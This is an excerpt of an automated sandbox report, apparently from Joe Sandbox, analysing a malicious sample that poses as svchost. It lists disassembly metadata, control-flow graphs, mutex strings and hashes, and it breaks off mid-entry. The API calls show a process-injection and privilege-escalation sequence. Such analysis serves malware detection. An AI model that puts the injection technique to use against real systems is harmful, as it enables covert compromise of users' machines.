                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileInfoQueryValueVersion_errno$AllocHeapSize_callnewhfreemallocsprintf
                                                      • String ID: \StringFileInfo\%04x%04x\ProductName$\VarFileInfo\Translation
                                                      • API String ID: 854303657-240727937
                                                      • Opcode ID: 938b9084050b12f7f51f4e5b3a0a94f65c5e6aedc38f4bf1dcb0040dab1e3ed7
                                                      • Instruction ID: c21a65e27a419a60c8be3834bc11d52b8ef56f4e58ab3682cf3e5a8e83c9a7dc
                                                      • Opcode Fuzzy Hash: 938b9084050b12f7f51f4e5b3a0a94f65c5e6aedc38f4bf1dcb0040dab1e3ed7
                                                      • Instruction Fuzzy Hash: 4A51B372204B8982EB96DF65E8403DE77A1F389BE4F409111FA9947699CF38C399C740

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                      • String ID: Local\xdfsa345srszdf
                                                      • API String ID: 1661045500-2207739924
                                                      • Opcode ID: 2056533ad930ce1928ccbe262b10e01048e0b68bc08cbd84cdd65ea3b3db014f
                                                      • Instruction ID: 3f27ef63e921679977fe6c1940a6dfdffcf72fbf18764cef409eb90716e0d065
                                                      • Opcode Fuzzy Hash: 2056533ad930ce1928ccbe262b10e01048e0b68bc08cbd84cdd65ea3b3db014f
                                                      • Instruction Fuzzy Hash: 93011D35A01E4486EBE39B14A81179633E0AB9D3A5F959214AA6D07BB0EF3C835DDB00

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 478 1800066a4-1800066bb 479 1800066c1-1800066c7 478->479 480 180006798-1800067a9 478->480 479->480 481 1800066cd-1800066d3 479->481 481->480 482 1800066d9-180006740 CreateProcessW 481->482 483 180006742-180006776 lstrlenW call 1800067ac 482->483 484 180006790-180006796 GetLastError 482->484 486 18000677b-18000677d 483->486 484->480 486->480 487 18000677f-18000678e TerminateProcess 486->487 487->480
                                                      APIs
                                                      • CreateProcessW.KERNELBASE ref: 0000000180006738
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000180006745
                                                        • Part of subcall function 00000001800067AC: VirtualAllocEx.KERNEL32 ref: 0000000180006862
                                                        • Part of subcall function 00000001800067AC: WriteProcessMemory.KERNELBASE ref: 00000001800068E6
                                                        • Part of subcall function 00000001800067AC: WriteProcessMemory.KERNELBASE ref: 000000018000690F
                                                        • Part of subcall function 00000001800067AC: WriteProcessMemory.KERNELBASE ref: 0000000180006935
                                                        • Part of subcall function 00000001800067AC: WriteProcessMemory.KERNELBASE ref: 0000000180006962
                                                      • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000180006786
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000180006790
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$MemoryWrite$AllocCreateErrorLastTerminateVirtuallstrlen
                                                      • String ID:
                                                      • API String ID: 314352606-0
                                                      • Opcode ID: a627acf18c057e6c1b37a91aa07843e52c1f40f30956bb822cfd9055965b5ad1
                                                      • Instruction ID: b8bdd9fdbc95cdffbefc913a4e0f777a3a93423ee4eaf517f882a8fe62165932
                                                      • Opcode Fuzzy Hash: a627acf18c057e6c1b37a91aa07843e52c1f40f30956bb822cfd9055965b5ad1
                                                      • Instruction Fuzzy Hash: 6621E27261875482EBA2CB55F80479AB7E5F78D7E4F458525BE4983B94DF3CC5088700

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00000001800013C0: CreateFileMappingA.KERNEL32 ref: 00000001800013E5
                                                        • Part of subcall function 00000001800013C0: GetLastError.KERNEL32 ref: 00000001800013F7
                                                        • Part of subcall function 0000000180003D40: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000180003E0A), ref: 0000000180003D53
                                                        • Part of subcall function 0000000180003D40: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000180003E0A), ref: 0000000180003D66
                                                        • Part of subcall function 0000000180003D40: LookupPrivilegeValueA.ADVAPI32 ref: 0000000180003D7A
                                                        • Part of subcall function 0000000180003D40: AdjustTokenPrivileges.ADVAPI32 ref: 0000000180003DB6
                                                        • Part of subcall function 0000000180003D40: CloseHandle.KERNELBASE ref: 0000000180003DC1
                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,000000018000824E), ref: 0000000180003E0A
                                                        • Part of subcall function 0000000180001450: _wcsftime_l.LIBCMT ref: 00000001800014B7
                                                      • CreateThread.KERNELBASE ref: 0000000180003E81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CreateCurrentToken$AdjustCloseErrorFileHandleLastLookupMappingOpenPrivilegePrivilegesThreadValue_wcsftime_l
                                                      • String ID: i:%d r:%d
                                                      • API String ID: 763594233-2265146720
                                                      • Opcode ID: c42333cd7d617a8df298f204f429bd3f302c9f9ed74dddf0a8b8520cb017b13a
                                                      • Instruction ID: 490f34cdb8a03b8733192fba0e704fb505af10175a091e6a183f27313ace56a5
                                                      • Opcode Fuzzy Hash: c42333cd7d617a8df298f204f429bd3f302c9f9ed74dddf0a8b8520cb017b13a
                                                      • Instruction Fuzzy Hash: A6118B35A04A8891E793DB62F8423D972A4B39C7E0F50C225FA6907AE6DF38874C8740

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 507 1800020f0-180002119 508 180002206-180002208 507->508 509 18000211f-180002122 507->509 510 1800021e5-180002205 call 180006bc0 508->510 509->508 511 180002128-180002162 CreateFileA 509->511 513 1800021d3-1800021e3 511->513 514 180002164-180002184 ReadFile 511->514 513->510 516 180002186-180002190 514->516 517 1800021ca-1800021cd CloseHandle 514->517 516->517 518 180002192-18000219f 516->518 517->513 518->517 519 1800021a1-1800021a4 518->519 519->517 520 1800021a6-1800021b0 519->520 520->517 521 1800021b2-1800021bc 520->521 521->517 522 1800021be-1800021c7 521->522 522->517
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleRead
                                                      • String ID:
                                                      • API String ID: 1035965006-0
                                                      • Opcode ID: a62afd48bd7b5c632a329c3c8a341a79fa5298a6d0d02ac82d9265fad697703e
                                                      • Instruction ID: 23d1192ce527e3ddbd9136285bea29a03487477f0838dd7d415faac91fb35e48
                                                      • Opcode Fuzzy Hash: a62afd48bd7b5c632a329c3c8a341a79fa5298a6d0d02ac82d9265fad697703e
                                                      • Instruction Fuzzy Hash: 03219631204A9881EBA2DF51E8547EAB3A0F758BD4F54C224EB9803BC4DF78C6598B40

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 539 180010040-180010088 call 18000feb0 542 180010091-180010094 539->542 543 18001008a-18001008c 539->543 545 180010096-1800100b0 call 18000a358 call 18000a3c8 call 180008f70 542->545 546 1800100b5-1800100e7 542->546 544 180010752-18001077b call 180006bc0 543->544 545->544 549 1800100f2-1800100f8 546->549 550 1800100e9-1800100f0 546->550 551 180010107-180010110 call 18000ff00 549->551 552 1800100fa-180010102 call 180010860 549->552 550->545 550->549 560 1800103d2-1800103e3 551->560 561 180010116-180010127 551->561 552->551 563 1800106b4-1800106d0 WriteFile 560->563 564 1800103e9-1800103f5 560->564 561->560 565 18001012d-180010161 call 18000a148 GetConsoleMode 561->565 570 1800106d2-1800106d8 563->570 571 1800106da-1800106e0 GetLastError 563->571 567 1800104c3-1800104c7 564->567 568 1800103fb-1800103fe 564->568 565->560 582 180010167-180010169 565->582 573 1800105a2-1800105a5 567->573 574 1800104cd-1800104d0 567->574 575 180010712-180010728 568->575 576 180010404 568->576 572 1800106e2-1800106e4 570->572 571->572 578 1800106e6-1800106e8 572->578 579 18001074c-180010750 572->579 573->575 583 1800105ab 573->583 574->575 580 1800104d6 574->580 584 180010734-180010744 call 18000a3c8 call 18000a358 575->584 585 18001072a-18001072e 575->585 581 180010407-180010412 576->581 578->575 587 1800106ea-1800106ed 578->587 579->544 588 1800104db-1800104e6 580->588 589 180010414-18001041d 581->589 590 180010174-180010188 GetConsoleCP 582->590 591 18001016b-18001016e 582->591 592 1800105b1-1800105b6 583->592 584->579 585->543 585->584 595 180010706-18001070d call 18000a378 587->595 596 1800106ef-1800106ff call 18000a3c8 call 18000a358 587->596 597 1800104e8-1800104f1 588->597 598 180010445-180010488 WriteFile 589->598 599 18001041f-180010428 589->599 600 1800103c9-1800103cd 590->600 601 18001018e-180010191 590->601 591->560 591->590 593 1800105b8-1800105c1 592->593 602 1800105f2-18001063b WideCharToMultiByte 593->602 603 1800105c3-1800105d0 593->603 595->575 596->595 606 180010524-180010567 WriteFile 597->606 607 1800104f3-180010500 597->607 598->571 613 18001048e-1800104a4 598->613 609 180010434-180010443 599->609 610 18001042a-180010431 599->610 600->578 611 180010197-1800101b6 601->611 612 18001031b-180010320 601->612 602->571 619 180010641 602->619 614 1800105d2-1800105da 603->614 615 1800105de-1800105f0 603->615 606->571 623 18001056d-180010583 606->623 621 180010502-18001050c 607->621 622 180010510-180010522 607->622 609->589 609->598 610->609 625 1800101d8-1800101e2 call 1800114a0 611->625 626 1800101b8-1800101d6 611->626 617 180010322-18001033e 612->617 618 180010340 612->618 613->572 627 1800104aa-1800104b8 613->627 614->615 615->593 615->602 631 180010345-18001034a 617->631 618->631 629 180010643-18001067d WriteFile 619->629 621->622 622->597 622->606 623->572 633 180010589-180010597 623->633 643 1800101e4-1800101f1 625->643 644 180010218-18001021e 625->644 634 180010221-18001022e call 180012c54 626->634 627->581 630 1800104be 627->630 638 18001068d-180010695 GetLastError 629->638 639 18001067f-180010689 629->639 630->572 636 18001034c-18001035b call 180012c5c 631->636 637 18001038b 631->637 633->588 642 18001059d 633->642 651 1800103c0-1800103c4 634->651 656 180010234-180010271 WideCharToMultiByte 634->656 636->571 660 180010361-180010367 636->660 649 180010390-180010398 637->649 646 180010699-18001069b 638->646 639->629 645 18001068b 639->645 642->572 652 1800101f7-18001020d call 180012c54 643->652 653 18001039f-1800103b7 643->653 644->634 645->646 646->572 655 18001069d-1800106ac 646->655 650 18001039a 649->650 649->651 650->601 651->572 652->651 664 180010213-180010216 652->664 653->651 655->592 658 1800106b2 655->658 656->651 659 180010277-1800102a6 WriteFile 656->659 658->572 659->571 663 1800102ac-1800102ba 659->663 660->637 662 180010369-18001037f call 180012c5c 660->662 662->571 670 180010385-180010387 662->670 663->651 665 1800102c0-1800102ca 663->665 664->656 665->649 668 1800102d0-180010302 WriteFile 665->668 668->571 669 180010308-18001030d 668->669 669->651 671 180010313-180010319 669->671 670->637 671->649
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno_invalid_parameter_noinfo
                                                      • String ID: U
                                                      • API String ID: 2959964966-4171548499
                                                      • Opcode ID: 7867c91d87ff0c411f054b43056a2f601585e8651b4d9676e42afd6711bb8b24
                                                      • Instruction ID: 2da888aa20696b1050f93bbd12bbbb3519b3bd5b1e20ee00050e1f47978b0431
                                                      • Opcode Fuzzy Hash: 7867c91d87ff0c411f054b43056a2f601585e8651b4d9676e42afd6711bb8b24
                                                      • Instruction Fuzzy Hash: 6512E272204E4986EBA28F24D4843DE77A1F78C7C4F608116FAC987A95DFB9D749CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$ErrorLastLocalOpensprintf$AllocByteCharCloseComputerFreeHandleMultiNameReleaseWide_errno_invalid_parameter_noinfo
                                                      • String ID: %s%s%saz$%^$%@#sa$EEFsd2$2#b.$83%1$dg79$gnbc344asd
                                                      • API String ID: 3147222814-918932147
                                                      • Opcode ID: 98fed7bc4a1050010b08977139a49ba924978a52dabcd1c4ef6de1547bd9ad9f
                                                      • Instruction ID: 293e967c104a2474f007c174b3d6cb4870e75df93d6087c018f724553ae28c8f
                                                      • Opcode Fuzzy Hash: 98fed7bc4a1050010b08977139a49ba924978a52dabcd1c4ef6de1547bd9ad9f
                                                      • Instruction Fuzzy Hash: 0E619B32A04B88C9F752DBA4E8443CD77B2F789798F508126FA9D57AA9CF34C649C740

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$ErrorLastLocalOpensprintf$AllocByteCharCloseComputerFreeHandleMultiNameReleaseWide_errno_invalid_parameter_noinfo
                                                      • String ID: %s%s%saz$%^$%@#sdfs_12$13a.$83y.$asdasd123$dh74
                                                      • API String ID: 3147222814-1644997536
                                                      • Opcode ID: 39eafb5069d4d64aaf3a6eb29112f8904af6c3e691d05d66285c8ecf96de8288
                                                      • Instruction ID: a78e320777d2644a08ae027232448d90c61c35bbfbefd3fc46fe211163294679
                                                      • Opcode Fuzzy Hash: 39eafb5069d4d64aaf3a6eb29112f8904af6c3e691d05d66285c8ecf96de8288
                                                      • Instruction Fuzzy Hash: 2B619D32A04B88C9F752CBA4E8443CD77B2F789798F508126FA8D57AA9DF74C649C740
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                      • String ID:
                                                      • API String ID: 4099253644-0
                                                      • Opcode ID: 9f480e9a157ec4e73b23699e557cb40cd369962389f0d03c52fb0e412cd43498
                                                      • Instruction ID: 7910da082eb8a25f1b72ceb468b50d858c92a30a15ee4efba3f35858ae8eccd0
                                                      • Opcode Fuzzy Hash: 9f480e9a157ec4e73b23699e557cb40cd369962389f0d03c52fb0e412cd43498
                                                      • Instruction Fuzzy Hash: B931E831601A8C81FED7DB51E8523E433A1AB5CBE1F09C664BD19462E2CFBC8B4C8B00
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                      • String ID:
                                                      • API String ID: 1012874770-0
                                                      • Opcode ID: ada72765c9aa323ee31e0f93902f823e7d177c0e768b129a1707f6faaf4597dd
                                                      • Instruction ID: 1e968e281ede070f6cd340e7967fb3000e68a20db94b7b649401a24c7a871535
                                                      • Opcode Fuzzy Hash: ada72765c9aa323ee31e0f93902f823e7d177c0e768b129a1707f6faaf4597dd
                                                      • Instruction Fuzzy Hash: AE313B7260488C91FAE3EB61E4923F83361A79CBC4F448051BD0E87A968F75DF88D761
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastMutexOpen
                                                      • String ID: ecf3@#$$1df6..`34
                                                      • API String ID: 2816522056-3207966746
                                                      • Opcode ID: 9aa00381d908c6502d3de6d7284ff14170c0eb9b1c9ca468e2e1b8fb5c632e96
                                                      • Instruction ID: e50fa9bfa1a6f2d9052eae0ffda0a744107ae6dba175da5cab484f5f575a2f75
                                                      • Opcode Fuzzy Hash: 9aa00381d908c6502d3de6d7284ff14170c0eb9b1c9ca468e2e1b8fb5c632e96
                                                      • Instruction Fuzzy Hash: 7D716B32B00B448AFB92DF71D4443DC33B2E7497D8F408525EA5A67AA9CF758649C344
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                      • String ID: UTF-8
                                                      • API String ID: 781512312-243350608
                                                      • Opcode ID: 01adfc77747f32d4e18643429f0cdc5f3c07004787623652f90158c8caed5d76
                                                      • Instruction ID: 263d6387c4d648f040f9d6f91d60d8c10a6fbd426bee965be4cabd021c04e328
                                                      • Opcode Fuzzy Hash: 01adfc77747f32d4e18643429f0cdc5f3c07004787623652f90158c8caed5d76
                                                      • Instruction Fuzzy Hash: E931D6F2708B8986FBF79B6195423ED66D0A74CBE0F54C221FA59077D5CE68CB498700
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: free$_errno
                                                      • String ID:
                                                      • API String ID: 2288870239-0
                                                      • Opcode ID: 9f480e9a157ec4e73b23699e557cb40cd369962389f0d03c52fb0e412cd43498
                                                      • Instruction ID: e1fe86c00d840c921d81d8eff2da28ee6f99fbce835c811bb7a569080ef2d395
                                                      • Opcode Fuzzy Hash: 9f480e9a157ec4e73b23699e557cb40cd369962389f0d03c52fb0e412cd43498
                                                      • Instruction Fuzzy Hash: 6E415D7031AE095FFB89EB5CF8A4BE436D0F796705F84C028E157C3591CE2C88488796
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                      • String ID: csm
                                                      • API String ID: 1037122555-1018135373
                                                      • Opcode ID: 4998a35fcf569e67779e2c8e4107303ccd93ed2d2766f2b59bebc9d01970d615
                                                      • Instruction ID: 3466defe207cca5ab2c5f43f2eace7dc67b6e628fff817094022631e23cfdfa8
                                                      • Opcode Fuzzy Hash: 4998a35fcf569e67779e2c8e4107303ccd93ed2d2766f2b59bebc9d01970d615
                                                      • Instruction Fuzzy Hash: D321213620468986E672DF15E0403DE77A0F38EBA4F448116EF9917795CF38E949CB01
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$_lock$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 854778215-0
                                                      • Opcode ID: d44b873149b9006942da67a867c652ae1859f4a614215c6e6d51a695d0603cc5
                                                      • Instruction ID: d9834fd355bf36162af0ef2ab7236a0e4ccf652efea0cfded55badc8211a2e5e
                                                      • Opcode Fuzzy Hash: d44b873149b9006942da67a867c652ae1859f4a614215c6e6d51a695d0603cc5
                                                      • Instruction Fuzzy Hash: 2151E332600F4882EBA2DF10D8403A9B3A5F788BD4F198525EE4D477E5EF78CA69C700
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                      • Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_180000000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$BuffersErrorFileFlushLast__lock_fhandle_getptd_noexit_unlock_fhandle
                                                      • String ID:
                                                      • API String ID: 211752500-0
                                                      • Opcode ID: 83061492b3cd907090767c04d13c2902e4ae0f7afc8b56462e1f75332be573f0
                                                      • Instruction ID: 6ff1552718acc7367ea462429f0e2fd32cbe771c593d226d1026a2c9de20d7c2
                                                      • Opcode Fuzzy Hash: 83061492b3cd907090767c04d13c2902e4ae0f7afc8b56462e1f75332be573f0
                                                      • Instruction Fuzzy Hash: 4221D531614F4C45FB975F69A8803ED3650AB8D7E0F59C128FA15073D2EE788B5D8310
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _getptd_noexit$__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                                                      • String ID:
                                                      • API String ID: 75911684-0
                                                      • Opcode ID: 44286c134b029a49fbd98e52ac3d62de1c89178b32646424a1c650f1b3a6d2cf
                                                      • Instruction ID: f1db82ea56ecadf460882bbf0e50b612b94b6d0861f4aa272d6f2be615d0b089
